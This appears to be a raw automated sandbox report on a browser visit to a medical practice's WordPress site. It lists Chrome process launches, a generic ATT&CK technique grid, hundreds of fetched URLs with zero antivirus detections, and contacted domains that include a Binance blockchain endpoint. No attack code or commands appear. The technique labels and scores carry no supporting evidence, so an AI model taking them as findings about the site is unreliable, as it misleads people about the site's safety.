Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://mipscenter.com0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://mipscenter.com/0%Avira URL Cloudsafe
https://mipscenter.com/wp-includes/js/jquery/jquery.min.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_dd440d21fcdf5f5f900dde931d0c3d24.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-includes/js/jquery/jquery-migrate.min.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_bd8588e4b0c0a35837f09d5678d2471c.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/pelvic-pain.jpg0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_a84aefbe1669acc7199e3303ac52a4b0.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_53f1dc6612cff59f6b2f009dea07397a.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_af9c7a15ed7204fbb889e056764bc429.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_ad34bf64095d41b275a906520ae9f961.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2024/02/108-1536x922.png0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_4272f4f016405eab091b0b7a96715832.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/themes/milo/fonts/fontawesome-webfont.woff2?v=4.7.00%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/dvt-and-vein.jpg0%Avira URL Cloudsafe
https://services.ohmd.com/main.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_902edd9f8303a0e7c9be4bf721669a29.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/new-obl-pic-1536x619.jpg0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/03/new-website-logo-360x98.png0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/third-party/animate.min.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_55ef45e593ebdf6ba97abd22330755d5.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_670c6b26a458600251838ce65c0c44a2.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_0793ca35f5d388181a5e6c01688af110.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_31fd6832d3761047ca9f7a21924839af.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_a9b8772172f95ce2efaf68dfd58e4152.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-includes/css/dist/components/style.min.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_54db845a8c1c9c5a52029d24e0141f76.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/css/frontend-icon-style.min.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_fb0c7bc7a6d9f663a06090c047a9fb61.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_cc3b1f8e28a52ec4b3ec993ec779e67d.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_6755415003869bd599c3fae8e9792027.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/Capture-1536x675.jpg0%Avira URL Cloudsafe
https://services.ohmd.com/widget.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/new-services.jpg0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_5b23ded83b6a631b06040ed574e43dd6.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_1638974264a50e67fbfefe35c0332581.js0%Avira URL Cloudsafe
https://services.ohmd.com/api/v1/widgets/96AC014A-76AF-4CB8-AC5F-9E7EF6E097650%Avira URL Cloudsafe
https://cdn.callrail.com/companies/373196729/wp-0-5-3/swap.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_d38ecc48a4303501a23f4b3518c189ce.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_fabf8e009e52edaa7a906809cd3f53ce.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/09/varicocele-callout-e1683787623318.jpeg0%Avira URL Cloudsafe
https://www.youtube.com/generate_204?Vie2MA0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_c2f22d5d09dfdd628e1facc491a5a0fd.js0%Avira URL Cloudsafe
https://i0.wp.com/mipscenter.com/wp-content/uploads/2021/03/favicon.png?resize=300%2C300&ssl=10%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_de72fa617fd0f9a08176003df4de2044.js0%Avira URL Cloudsafe
https://www.youtube.com/s/player/8a8ac953/www-embed-player.vflset/www-embed-player.js0%Avira URL Cloudsafe
https://events.api.secureserver.net/t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A08.726Z&hit_id=add2f83d-e361-440c-b491-2ad4c82edf84&ht=pageview&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=18060728750%Avira URL Cloudsafe
https://i.ytimg.com/vi_webp/LUgFEp-Aczk/sddefault.webp0%Avira URL Cloudsafe
https://www.youtube.com/embed/LUgFEp-Aczk0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/js/animation-listeners.min.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_7bef6ce7a551419eda56949734c4e27c.js0%Avira URL Cloudsafe
https://events.api.secureserver.net/t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A12.018Z&hit_id=d920f60c-01ae-4ef4-a06b-968e52577f72&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1638016116&tce=1743111902918&tcs=1743111902728&tdc=1743111911986&tdclee=1743111907849&tdcles=1743111907837&tdi=1743111905030&tdl=1743111903165&tdle=1743111902728&tdls=1743111902728&tfs=1743111902481&tns=1743111902467&trqs=1743111902918&tre=1743111903357&trps=1743111903156&tles=1743111911986&tlee=0&nt=navigate&LCP=6232&nav_type=hard0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_23443f3486906cc9bc9afb0133ddc022.js0%Avira URL Cloudsafe
https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/embed.js0%Avira URL Cloudsafe
https://mipscenter.com/temp0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_58be82360cff05a82d3af2e489d97263.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2024/02/109-1-1536x922.png0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f8baa9b6a9ab8164f24c1ee632ee2a56.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f92b60460a40c563830b73c3b5f644e0.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/03/cropped-favicon-1-32x32.png0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_3e41bfa32dc3e7aa84064d9e9d0969b3.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2024/01/99-1536x922.jpg0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_252a7a5bbb2e3dd12f13c550625cc8ba.js0%Avira URL Cloudsafe
https://www.youtube.com/s/player/8a8ac953/www-player.css0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f4f041ab9c04771db09b5b5afee674e4.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_40635054e327b749517fbfc876906d27.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_36a0c64573c39884cdd5b91f8dc1cdf0.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/03/content-bg-2-1536x624.png0%Avira URL Cloudsafe
https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-117802564-8&cid=875376301.1743111908&jid=264669138&gjid=645787295&_gid=157563918.1743111908&_u=YGBAiEABBAAAAGAAI~&z=14039244680%Avira URL Cloudsafe
https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/remote.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_40972936af67684ca90b6211f9216288.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/02/UFE-360x165.jpg0%Avira URL Cloudsafe
https://yt3.ggpht.com/ytc/AIdro_kcSUx4AUb3Ynub5dgqznmhyOtqJl0y0l5_u7tdNuUO=s68-c-k-c0x00ffffff-no-rj0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/uploads/2021/03/hr-e1614875034935.png0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_4bad469c4113485f1a84ece2da345aa8.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_39665ee2dc57bef3021cf6babd84a7c6.js0%Avira URL Cloudsafe
https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_45d0d23ed0cb5c8dceb54a1359eec7b6.js0%Avira URL Cloudsafe
https://cdn.callrail.com/companies/373196729/b510a7ffe1052e4121c0/12/swap.js0%Avira URL Cloudsafe
https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/base.js0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
199.232.89.229
truefalse
    high
    e8843.dsca.akamaiedge.net
    23.201.191.59
    truefalse
      high
      beacons3.gvt2.com
      142.250.80.67
      truefalse
        high
        e40258.g.akamaiedge.net
        23.209.72.207
        truefalse
          high
          cdn.callrail.com
          13.33.252.15
          truefalse
            high
            i.ytimg.com
            142.250.65.214
            truefalse
              high
              beacons-handoff.gcp.gvt2.com
              142.250.115.94
              truefalse
                high
                s-part-0013.t-0009.t-msedge.net
                13.107.246.41
                truefalse
                  high
                  stats.g.doubleclick.net
                  142.251.111.154
                  truefalse
                    high
                    services.ohmd.com
                    18.206.37.78
                    truefalse
                      unknown
                      mipscenter.com
                      160.153.0.94
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          high
                          photos-ugc.l.googleusercontent.com
                          142.250.80.33
                          truefalse
                            high
                            www.google.com
                            142.251.40.132
                            truefalse
                              high
                              beacons2.gvt2.com
                              142.250.74.35
                              truefalse
                                high
                                i0.wp.com
                                192.0.77.2
                                truefalse
                                  high
                                  beacons.gvt2.com
                                  142.250.81.227
                                  truefalse
                                    high
                                    static.doubleclick.net
                                    142.250.176.198
                                    truefalse
                                      high
                                      youtube-ui.l.google.com
                                      142.250.81.238
                                      truefalse
                                        high
                                        googleads.g.doubleclick.net
                                        142.251.32.98
                                        truefalse
                                          high
                                          play.google.com
                                          142.251.40.142
                                          truefalse
                                            high
                                            td.doubleclick.net
                                            142.250.80.34
                                            truefalse
                                              high
                                              e64861.dsca.akamaiedge.net
                                              23.48.224.108
                                              truefalse
                                                high
                                                beacons4.gvt2.com
                                                216.239.32.116
                                                truefalse
                                                  high
                                                  a1d4ba62fdc34338f.awsglobalaccelerator.com
                                                  35.71.137.105
                                                  truefalse
                                                    unknown
                                                    img1.wsimg.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      yt3.ggpht.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        cdn.jsdelivr.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          beacons.gcp.gvt2.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            otelrules.svc.static.microsoft
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              www.youtube.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                bsc-dataseed.binance.org
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  events.api.secureserver.net
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    csp.secureserver.net
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                                                        high
                                                                        https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                                                              high
                                                                              https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                                                                  high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                                                    high
                                                                                    https://services.ohmd.com/api/v1/widgets/96AC014A-76AF-4CB8-AC5F-9E7EF6E09765false
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_af9c7a15ed7204fbb889e056764bc429.csstrue
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://services.ohmd.com/widget.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                                                        high
                                                                                        https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_cc3b1f8e28a52ec4b3ec993ec779e67d.jstrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://mipscenter.com/wp-content/uploads/2024/02/108-1536x922.pngtrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_5b23ded83b6a631b06040ed574e43dd6.jstrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                                                              high
                                                                                              https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                                                                high
                                                                                                https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                                                                  high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                                                                    high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                                                        high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                                                          high
                                                                                                          https://www.youtube.com/s/player/8a8ac953/www-embed-player.vflset/www-embed-player.jsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                                                            high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                                                              high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                                                          high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/third-party/animate.min.csstrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.jsfalse
                                                                                                                                  high
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                                                                    high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://i0.wp.com/mipscenter.com/wp-content/uploads/2021/03/favicon.png?resize=300%2C300&ssl=1false
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                                                          high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                                                                            high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                                                                              high
                                                                                                                                              https://img1.wsimg.com/signals/js/clients/tti/tti.min.jsfalse
                                                                                                                                                high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.youtube.com/embed/LUgFEp-Aczkfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                                                                      high
                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/id?slf_rd=1false
                                                                                                                                                        high
                                                                                                                                                        https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_a9b8772172f95ce2efaf68dfd58e4152.jstrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/js/animation-listeners.min.jstrue
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://mipscenter.com/wp-includes/css/dist/components/style.min.csstrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://events.api.secureserver.net/t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A12.018Z&hit_id=d920f60c-01ae-4ef4-a06b-968e52577f72&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1638016116&tce=1743111902918&tcs=1743111902728&tdc=1743111911986&tdclee=1743111907849&tdcles=1743111907837&tdi=1743111905030&tdl=1743111903165&tdle=1743111902728&tdls=1743111902728&tfs=1743111902481&tns=1743111902467&trqs=1743111902918&tre=1743111903357&trps=1743111903156&tles=1743111911986&tlee=0&nt=navigate&LCP=6232&nav_type=hardfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://mipscenter.com/wp-content/uploads/2024/02/109-1-1536x922.pngtrue
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://mipscenter.com/wp-content/uploads/2021/03/cropped-favicon-1-32x32.pngtrue
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://bsc-dataseed.binance.org/false
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://mipscenter.com/wp-content/themes/milo/fonts/fontawesome-webfont.woff2?v=4.7.0true
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://img1.wsimg.com/signals/js/clients/scc-c2/scc-c2.min.jsfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                                                              high
